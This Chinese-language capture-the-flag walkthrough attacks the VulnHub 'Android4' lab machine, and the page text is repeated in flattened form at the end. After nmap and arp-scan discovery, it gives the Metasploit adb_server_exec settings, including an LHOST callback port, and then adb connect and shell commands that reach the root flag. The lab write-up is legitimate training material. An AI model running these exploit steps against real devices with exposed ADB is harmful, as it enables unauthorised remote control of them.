记一次对`vulnhub`中`Android4`靶机渗透测试全过程
字数 1131 2025-08-27 12:33:23

Android4 靶机渗透测试教学文档

靶机简介

  • 名称: Android4
  • 操作系统: Android v4.4
  • 标志位置: /data/root/
  • 难度等级: 初学者
  • 下载链接: Android4.ova

涉及知识点

  1. 端口扫描和IP发现
  2. 使用adb_server_exec攻击端口8080代理
  3. 使用ADB(Android Debug Bridge)连接到设备
  4. 使用Metasploit框架
  5. 特权升级和获取flag

详细渗透过程

1. 获取靶机IP地址

使用arp-scan工具扫描本地网络中的设备:

arp-scan -l

通过扫描结果确定靶机的IP地址(示例中为192.168.232.146)。

2. 扫描开放端口

使用Nmap进行全端口扫描和版本探测:

nmap -p- -A 192.168.232.146

扫描结果显示端口8080开放,可能运行着某种网页服务。

3. 初步探测

尝试访问http://192.168.232.146:8080,但未发现有用信息。

尝试以下方法均未成功:

  • PHP CLI漏洞利用
  • Dropbear RCE漏洞利用

4. 使用Android Debug Bridge (ADB)

安装ADB

如果系统未安装ADB,先进行安装:

sudo apt-get install adb

使用Metasploit启动ADB服务器

  1. 启动Metasploit框架:
msfconsole
  1. 使用adb_server_exec模块:
use exploit/android/adb/adb_server_exec
set RHOST 192.168.232.146
set LHOST [你的本地IP]
set LPORT 3333  # 修改默认端口以避免冲突
exploit
  1. 当显示"正在连接到设备"时,在新终端中连接ADB:
adb connect 192.168.232.146:5555
adb shell

5. 权限提升和获取flag

  1. 进入设备shell后,检查目录:
ls
  1. 进入/data目录:
cd /data
ls
  1. 发现root文件夹:
cd root
ls
  1. 查看flag文件:
cat flag.txt

关键工具和技术说明

Android Debug Bridge (ADB)

ADB是一个多功能命令行工具,用于与Android设备通信。它包含三个组件:

  1. 客户端:在开发计算机上运行,通过adb命令调用
  2. 守护程序(adbd):在设备上运行命令的后台进程
  3. 服务器:管理客户端和守护程序之间的通信

Metasploit的adb_server_exec模块

该模块利用ADB服务漏洞,允许攻击者通过开放的ADB端口执行任意命令。

搜索漏洞利用

可以使用searchsploit工具搜索已知漏洞:

searchsploit -w php cli
searchsploit dropbear

参考资料

  1. 破解Android4:演练(CTF挑战)
  2. adb使用-详细教程(Awesome Adb)
  3. 记一次在实战靶机中使用SearchSploit的总结

总结

本渗透测试过程展示了如何通过ADB服务漏洞获取Android设备的控制权。关键步骤包括:

  1. 网络发现和端口扫描
  2. 识别开放的ADB服务
  3. 使用Metasploit利用漏洞
  4. 通过ADB连接获取shell访问
  5. 权限提升和获取flag

此过程适合初学者学习基本的Android设备渗透测试技术。

Android4 靶机渗透测试教学文档 靶机简介 名称 : Android4 操作系统 : Android v4.4 标志位置 : /data/root/ 难度等级 : 初学者 下载链接 : Android4.ova 涉及知识点 端口扫描和IP发现 使用adb_ server_ exec攻击端口8080代理 使用ADB(Android Debug Bridge)连接到设备 使用Metasploit框架 特权升级和获取flag 详细渗透过程 1. 获取靶机IP地址 使用 arp-scan 工具扫描本地网络中的设备: 通过扫描结果确定靶机的IP地址(示例中为 192.168.232.146 )。 2. 扫描开放端口 使用Nmap进行全端口扫描和版本探测: 扫描结果显示端口8080开放,可能运行着某种网页服务。 3. 初步探测 尝试访问 http://192.168.232.146:8080 ,但未发现有用信息。 尝试以下方法均未成功: PHP CLI漏洞利用 Dropbear RCE漏洞利用 4. 使用Android Debug Bridge (ADB) 安装ADB 如果系统未安装ADB,先进行安装: 使用Metasploit启动ADB服务器 启动Metasploit框架: 使用adb_ server_ exec模块: 当显示"正在连接到设备"时,在新终端中连接ADB: 5. 权限提升和获取flag 进入设备shell后,检查目录: 进入/data目录: 发现root文件夹: 查看flag文件: 关键工具和技术说明 Android Debug Bridge (ADB) ADB是一个多功能命令行工具,用于与Android设备通信。它包含三个组件: 客户端 :在开发计算机上运行,通过adb命令调用 守护程序(adbd) :在设备上运行命令的后台进程 服务器 :管理客户端和守护程序之间的通信 Metasploit的adb_ server_ exec模块 该模块利用ADB服务漏洞,允许攻击者通过开放的ADB端口执行任意命令。 搜索漏洞利用 可以使用 searchsploit 工具搜索已知漏洞: 参考资料 破解Android4:演练(CTF挑战) adb使用-详细教程(Awesome Adb) 记一次在实战靶机中使用SearchSploit的总结 总结 本渗透测试过程展示了如何通过ADB服务漏洞获取Android设备的控制权。关键步骤包括: 网络发现和端口扫描 识别开放的ADB服务 使用Metasploit利用漏洞 通过ADB连接获取shell访问 权限提升和获取flag 此过程适合初学者学习基本的Android设备渗透测试技术。